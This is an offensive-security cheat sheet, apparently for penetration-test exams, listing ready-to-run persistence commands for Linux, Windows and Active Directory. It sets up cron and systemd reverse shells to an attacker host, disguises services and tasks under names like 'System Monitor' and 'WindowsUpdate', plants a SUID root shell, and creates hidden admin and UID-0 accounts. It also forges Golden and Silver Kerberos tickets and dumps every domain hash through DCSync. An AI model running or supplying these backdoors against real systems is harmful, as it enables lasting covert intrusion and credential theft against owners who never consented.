Persistence Techniques

Maintaining access after initial compromise. Critical for AD sets where you pivot across machines.


LINUX PERSISTENCE

SSH key backdoor

Add your SSH key to a user — Survive password changes and reboots

# Generate key on attacker:
ssh-keygen -f backdoor_key -t rsa -N ""

# On target (as root or target user):
mkdir -p /home/user/.ssh
echo "ssh-rsa AAAA... your_key" >> /home/user/.ssh/authorized_keys
chmod 700 /home/user/.ssh
chmod 600 /home/user/.ssh/authorized_keys

# Connect:
ssh -i backdoor_key user@$IP

Cron job backdoor

Schedule a reverse shell — Reconnects every minute

# As root:
(crontab -l; echo "* * * * * bash -i >& /dev/tcp/$LHOST/4444 0>&1") | crontab -

# Or write to cron directory:
echo '* * * * * root bash -i >& /dev/tcp/$LHOST/4444 0>&1' > /etc/cron.d/backdoor

SUID bash backdoor

Copy bash with SUID bit — Instant root anytime

# As root:
cp /bin/bash /tmp/.backdoor
chmod +s /tmp/.backdoor

# Later (as any user):
/tmp/.backdoor -p
# -p preserves SUID = root shell

Add user with root privileges

Create a backup admin account — Last resort persistence

# Add user with UID 0:
echo 'backdoor:$(openssl passwd -1 password123):0:0::/root:/bin/bash' >> /etc/passwd

# Or with useradd:
useradd -ou 0 -g 0 -M -d /root -s /bin/bash backdoor
echo "backdoor:password123" | chpasswd

Modify existing service

Backdoor an init script or systemd service — Runs on boot

# Systemd:
cat > /etc/systemd/system/backdoor.service << UNIT
[Unit]
Description=System Monitor
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$LHOST/4444 0>&1'
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
UNIT
systemctl enable backdoor.service
systemctl start backdoor.service

WINDOWS PERSISTENCE

Registry Run Keys

Execute payload on user login — Survives reboots

# Current user:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\shell.exe"

# All users (needs admin):
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\shell.exe"

Scheduled task persistence

Create task that runs on login or at interval — Runs as SYSTEM

schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\shell.exe" /sc onlogon /ru SYSTEM
schtasks /create /tn "SystemCheck" /tr "C:\Windows\Temp\shell.exe" /sc minute /mo 5 /ru SYSTEM

New local admin user

Create a hidden admin account — Quick re-entry

net user backdoor Password123! /add
net localgroup Administrators backdoor /add

# Hide from login screen (optional):
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0

RDP enable

Turn on RDP for persistent GUI access — If not already enabled

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Connect: xfreerdp /u:user /p:pass /v:$IP

WinRM enable

Enable WinRM for persistent shell access — PowerShell remoting

Enable-PSRemoting -Force
winrm quickconfig -q
# Connect: evil-winrm -i $IP -u user -p 'password'

AD PERSISTENCE

Golden Ticket

Forge TGT with krbtgt hash — Persist as any user indefinitely

# After DCSync:
impacket-ticketer -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain domain.local administrator
# Valid for 10 years by default

DCSync for all hashes

Dump every hash in the domain — Can re-compromise anything

impacket-secretsdump domain.local/admin:'Password1'@$DC_IP
# Save output — these hashes let you PtH to any machine

Add user to Domain Admins

Direct group manipulation — If you have the rights

net group "Domain Admins" backdoor /add /domain
# Or with PowerView:
Add-DomainGroupMember -Identity "Domain Admins" -Members "backdoor"

Silver Ticket for specific service

Forge service ticket — Access one service indefinitely

# Useful when you need persistent access to one machine's CIFS/HTTP/etc
impacket-ticketer -nthash <service_hash> -domain-sid S-1-5-21-... -domain domain.local -spn cifs/target.domain.local administrator

WHEN TO USE PERSISTENCE

Engagement Scenario → Persistence Method
─────────────────────────────────────────
Single Linux box      → SSH key + SUID bash
Single Windows box    → Scheduled task + new admin user
AD: Need to pivot     → Add creds to multiple machines
AD: Post-DA           → Golden Ticket + DCSync dump
Exam: AD set          → Keep creds documented, WinRM/RDP enabled